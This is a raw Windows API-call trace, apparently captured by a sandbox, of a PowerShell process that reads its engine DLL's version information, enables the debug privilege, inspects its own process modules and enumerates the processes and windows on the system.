	[0249.936] GetVersionExW (in: lpVersionInformation=0x12dde0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dde0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0249.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.946] GetVersionExW (in: lpVersionInformation=0x12db50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12db50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0250.506] SetErrorMode (uMode=0x1) returned 0x1
	[0250.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dcb0 | out: lpFileInformation=0x12dcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0250.508] SetErrorMode (uMode=0x1) returned 0x1
	[0250.511] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12df20 | out: lpdwHandle=0x12df20) returned 0x94c
	[0250.513] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c572d8 | out: lpData=0x2c572d8) returned 1
	[0250.515] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c57374, puLen=0x12de90) returned 1
	[0250.517] lstrlenW (lpString="䅁") returned 1
	[0250.525] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c57450, puLen=0x12de00) returned 1
	[0250.526] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0250.527] CoTaskMemAlloc (cb=0x2e) returned 0x366c30
	[0250.527] lstrcpyW (in: lpString1=0x366c30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0250.528] CoTaskMemFree (pv=0x366c30) 
	[0250.528] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c574a4, puLen=0x12de00) returned 1
	[0250.528] lstrlenW (lpString="System.Management.Automation") returned 28
	[0250.528] CoTaskMemAlloc (cb=0x3c) returned 0x2e8ee0
	[0250.528] lstrcpyW (in: lpString1=0x2e8ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0250.528] CoTaskMemFree (pv=0x2e8ee0) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c57500, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0250.529] CoTaskMemAlloc (cb=0x20) returned 0x367080
	[0250.529] lstrcpyW (in: lpString1=0x367080, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0250.529] CoTaskMemFree (pv=0x367080) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c57540, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0250.529] CoTaskMemAlloc (cb=0x44) returned 0x2e8ee0
	[0250.529] lstrcpyW (in: lpString1=0x2e8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0250.529] CoTaskMemFree (pv=0x2e8ee0) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c575a8, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0250.529] CoTaskMemAlloc (cb=0x76) returned 0x3191b0
	[0250.529] lstrcpyW (in: lpString1=0x3191b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0250.529] CoTaskMemFree (pv=0x3191b0) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c57644, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0250.529] CoTaskMemAlloc (cb=0x44) returned 0x2e8ee0
	[0250.529] lstrcpyW (in: lpString1=0x2e8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0250.529] CoTaskMemFree (pv=0x2e8ee0) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c576a8, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0250.529] CoTaskMemAlloc (cb=0x58) returned 0x2ce3a0
	[0250.529] lstrcpyW (in: lpString1=0x2ce3a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0250.529] CoTaskMemFree (pv=0x2ce3a0) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c57724, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0250.529] CoTaskMemAlloc (cb=0x20) returned 0x367080
	[0250.529] lstrcpyW (in: lpString1=0x367080, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0250.529] CoTaskMemFree (pv=0x367080) 
	[0250.529] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x2c573cc, puLen=0x12de00) returned 1
	[0250.529] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0250.529] CoTaskMemAlloc (cb=0x66) returned 0x2ec2f0
	[0250.529] lstrcpyW (in: lpString1=0x2ec2f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0250.530] CoTaskMemFree (pv=0x2ec2f0) 
	[0250.530] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x0, puLen=0x12de00) returned 0
	[0250.530] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x0, puLen=0x12de00) returned 0
	[0250.530] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12de08, puLen=0x12de00 | out: lplpBuffer=0x12de08*=0x0, puLen=0x12de00) returned 0
	[0250.530] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12ddd8, puLen=0x12ddd0 | out: lplpBuffer=0x12ddd8*=0x2c57374, puLen=0x12ddd0) returned 1
	[0250.531] CoTaskMemAlloc (cb=0x204) returned 0x315520
	[0250.531] VerLanguageNameW (in: wLang=0x0, szLang=0x315520, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0250.532] CoTaskMemFree (pv=0x315520) 
	[0250.532] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\", lplpBuffer=0x12de28, puLen=0x12de20 | out: lplpBuffer=0x12de28*=0x2c57300, puLen=0x12de20) returned 1
	[0250.537] GetCurrentProcessId () returned 0x4b4
	[0251.117] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cd50 | out: lpLuid=0x12cd50*(LowPart=0x14, HighPart=0)) returned 1
	[0251.119] GetCurrentProcess () returned 0xffffffffffffffff
	[0251.119] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cd70 | out: TokenHandle=0x12cd70*=0x2ec) returned 1
	[0251.120] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2c5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0251.121] CloseHandle (hObject=0x2ec) returned 1
	[0251.124] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b4) returned 0x2ec
	[0251.132] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2c5abb8, cb=0x200, lpcbNeeded=0x12dd88 | out: lphModule=0x2c5abb8, lpcbNeeded=0x12dd88) returned 1
	[0251.134] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2c5ae28, cb=0x18 | out: lpmodinfo=0x2c5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0251.135] CoTaskMemAlloc (cb=0x804) returned 0x36fd00
	[0251.135] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x36fd00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0251.135] CoTaskMemFree (pv=0x36fd00) 
	[0251.136] CoTaskMemAlloc (cb=0x804) returned 0x36fd00
	[0251.136] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x36fd00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0251.136] CoTaskMemFree (pv=0x36fd00) 
	[0251.137] CloseHandle (hObject=0x2ec) returned 1
	[0251.143] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x4b4) returned 0x2ec
	[0251.144] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x12deb8 | out: lpExitCode=0x12deb8*=0x103) returned 1
	[0251.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0x12de80 | out: SystemInformation=0x12c5b088, ResultLength=0x12de80*=0x10390) returned 0x0
	[0251.581] EnumWindows (lpEnumFunc=0x2bd66ac, lParam=0x0) returned 1
	[0253.693] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0254.205] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x558
	[0254.206] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0255.500] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0256.248] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0256.395] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x538
	[0257.029] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.521] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x778
	[0257.521] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x778
	[0257.521] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.522] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xa6c
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xa68
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x9f8
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xa04
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x924
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x8dc
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x7dc
	[0257.523] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x768
	[0257.524] GetWindow (hWnd=0x301d6, uCmd=0x4) returned 0x0
	[0257.525] IsWindowVisible (hWnd=0x301d6) returned 0
	[0257.525] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x764
	[0257.525] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x820
	[0257.525] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x810
	[0257.525] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x794
	[0257.525] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x83c
	[0257.525] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x7ac
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb44
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb5c
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x838
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.526] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.527] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x818
	[0257.527] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x5b8
	[0257.527] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x494
	[0257.527] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x1ec
	[0257.527] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x440
	[0257.527] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x7e8
	[0257.528] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x730
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x2c8
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x31c
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x330
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x128
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x5c8
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x6f8
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x358
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x73c
	[0257.529] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb0
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x250
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x240
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x790
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x61c
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x540
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x538
	[0257.530] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x568
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x538
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x568
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x538
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x540
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x540
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x510
	[0257.531] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x57c
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x554
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x528
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x79c
	[0257.532] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4e0
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x44c
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x778
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.533] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x558
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4d0
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x7e0
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xa74
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x694
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xa28
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x9b0
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x8d8
	[0257.534] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x940
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x93c
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4ec
